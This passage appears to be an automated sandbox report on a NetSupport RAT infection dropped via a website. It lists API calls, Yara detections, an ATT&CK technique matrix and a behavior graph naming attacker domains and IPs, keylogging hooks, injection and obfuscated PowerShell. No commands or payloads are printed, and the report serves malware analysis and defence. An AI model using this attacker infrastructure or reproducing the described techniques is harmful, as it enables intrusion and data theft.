                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,37_2_6CCB02AD
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,37_2_6CCB2218
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,37_2_6CCB1CC1
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoA,37_2_6CCBDC99
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,37_2_6CCBDC56
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,37_2_6CCB1DB6
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,37_2_6CCB1EB8
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,37_2_6CCB1E5D
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,37_2_6CCAFAE1
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,37_2_6CCBDB7C
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,37_2_6CCB1680
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA30486 CreateNamedPipeW,34_2_00007FFC8BA30486
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11177075 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,37_2_11177075
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,37_2_1103B160
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,37_2_11174AE9
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_111450A0 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,37_2_111450A0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,37_2_11070090
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,37_2_110D8200
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC8A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,37_2_6CC8A980
                                  Source: Yara matchFile source: 37.0.client32.exe.d30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 37.2.client32.exe.707b0000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 34.2.powershell.exe.28fcf164fe0.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 34.2.powershell.exe.28fcf0141a8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 37.2.client32.exe.6cf80000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 34.2.powershell.exe.28fcf01e3f8.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 37.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 37.2.client32.exe.6cc80000.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 37.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000025.00000002.2428598700.00000000111E1000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000025.00000000.1919964679.0000000000D3F000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000025.00000000.1919964679.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000025.00000002.2428248444.0000000011193000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2500, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 6788, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Options\client32.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Options\pcicapi.dll, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information11
                                  Scripting                                  		2
                                  Valid Accounts                                  		1
                                  Windows Management Instrumentation                                  		11
                                  Scripting                                  		1
                                  DLL Side-Loading                                  		11
                                  Deobfuscate/Decode Files or Information                                  		1
                                  Credential API Hooking                                  		12
                                  System Time Discovery                                  		Remote Services1
                                  Archive Collected Data                                  		3
                                  Ingress Tool Transfer                                  		Exfiltration Over Other Network Medium1
                                  System Shutdown/Reboot
                                  CredentialsDomainsDefault Accounts4
                                  Native API                                  		1
                                  DLL Side-Loading                                  		1
                                  Extra Window Memory Injection                                  		3
                                  Obfuscated Files or Information                                  		121
                                  Input Capture                                  		1
                                  Account Discovery                                  		Remote Desktop Protocol1
                                  Screen Capture                                  		21
                                  Encrypted Channel                                  		Exfiltration Over Bluetooth1
                                  Defacement
                                  Email AddressesDNS ServerDomain Accounts1
                                  Command and Scripting Interpreter                                  		2
                                  Valid Accounts                                  		2
                                  Valid Accounts                                  		1
                                  Software Packing                                  		Security Account Manager3
                                  File and Directory Discovery                                  		SMB/Windows Admin Shares1
                                  Credential API Hooking                                  		4
                                  Non-Application Layer Protocol                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts2
                                  Service Execution                                  		1
                                  Windows Service                                  		21
                                  Access Token Manipulation                                  		1
                                  DLL Side-Loading                                  		NTDS34
                                  System Information Discovery                                  		Distributed Component Object Model121
                                  Input Capture                                  		5
                                  Application Layer Protocol                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud Accounts2
                                  PowerShell                                  		2
                                  Browser Extensions                                  		1
                                  Windows Service                                  		1
                                  Extra Window Memory Injection                                  		LSA Secrets251
                                  Security Software Discovery                                  		SSH3
                                  Clipboard Data                                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                                  Registry Run Keys / Startup Folder                                  		13
                                  Process Injection                                  		1
                                  Masquerading                                  		Cached Domain Credentials2
                                  Process Discovery                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                  Registry Run Keys / Startup Folder                                  		2
                                  Valid Accounts                                  		DCSync31
                                  Virtualization/Sandbox Evasion                                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  Modify Registry                                  		Proc Filesystem11
                                  Application Window Discovery                                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                                  Virtualization/Sandbox Evasion                                  		/etc/passwd and /etc/shadow1
                                  System Owner/User Discovery                                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                  Access Token Manipulation                                  		Network Sniffing1
                                  System Network Configuration Discovery                                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd13
                                  Process Injection                                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                  Rundll32                                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1696974 URL: http://fountainofhealth.ca Startdate: 22/05/2025 Architecture: WINDOWS Score: 100 79 windomstatetheater.com 2->79 81 lang3666.top 2->81 83 6 other IPs or domains 2->83 109 Suricata IDS alerts for network traffic 2->109 111 Antivirus detection for URL or domain 2->111 113 Sigma detected: Powershell drops NetSupport RAT client 2->113 115 6 other signatures 2->115 13 osk.exe 67 2->13         started        16 chrome.exe 2 2->16         started        19 rundll32.exe 2->19         started        21 2 other processes 2->21 signatures3 process4 dnsIp5 123 Installs a global keyboard hook 13->123 125 Installs a global event hook (focus changed) 13->125 23 explorer.exe 8 12 13->23 injected 75 192.168.2.17, 443, 49677, 49706 unknown unknown 16->75 77 192.168.2.5 unknown unknown 16->77 26 chrome.exe 16->26         started        29 chrome.exe 16->29         started        31 chrome.exe 6 16->31         started        signatures6 process7 dnsIp8 119 Obfuscated command line found 23->119 33 conhost.exe 23->33         started        85 lang3666.top 193.111.208.110, 443, 49734, 49794 CRONON-ASObermuensterstr9DE Germany 26->85 87 i.ytimg.com 142.250.101.119, 443, 49751 GOOGLEUS United States 26->87 89 21 other IPs or domains 26->89 signatures9 process10 signatures11 107 Obfuscated command line found 33->107 36 cmd.exe 1 33->36         started        process12 signatures13 117 Suspicious powershell command line found 36->117 39 cmd.exe 2 36->39         started        42 cmd.exe 1 36->42         started        process14 signatures15 121 Suspicious powershell command line found 39->121 44 powershell.exe 29 39->44         started        47 client32.exe 4 39->47         started        51 powershell.exe 14 8 39->51         started        55 2 other processes 39->55 53 cmd.exe 1 42->53         started        process16 dnsIp17 63 C:\Users\user\AppData\...\vpnclient2.dll, PE32 44->63 dropped 65 C:\Users\user\AppData\...\remcmdstub.exe, PE32 44->65 dropped 67 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 44->67 dropped 71 8 other malicious files 44->71 dropped 93 94.158.245.131 MIVOCLOUDMD Moldova Republic of 47->93 97 Multi AV Scanner detection for dropped file 47->97 99 Contains functionalty to change the wallpaper 47->99 101 Delayed program exit found 47->101 103 Contains functionality to detect sleep reduction / modifications 47->103 95 windomstatetheater.com 35.206.121.228 GOOGLE-2US United States 51->95 69 C:\Users\user\AppData\...\Application.zip, Zip 51->69 dropped 105 Powershell drops PE file 51->105 57 cmd.exe 1 53->57         started        file18 signatures19 process20 process21 59 curl.exe 2 57->59         started        dnsIp22 91 127.0.0.1 unknown unknown 59->91 73 C:\ProgramData\win.bat, ASCII 59->73 dropped file23

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.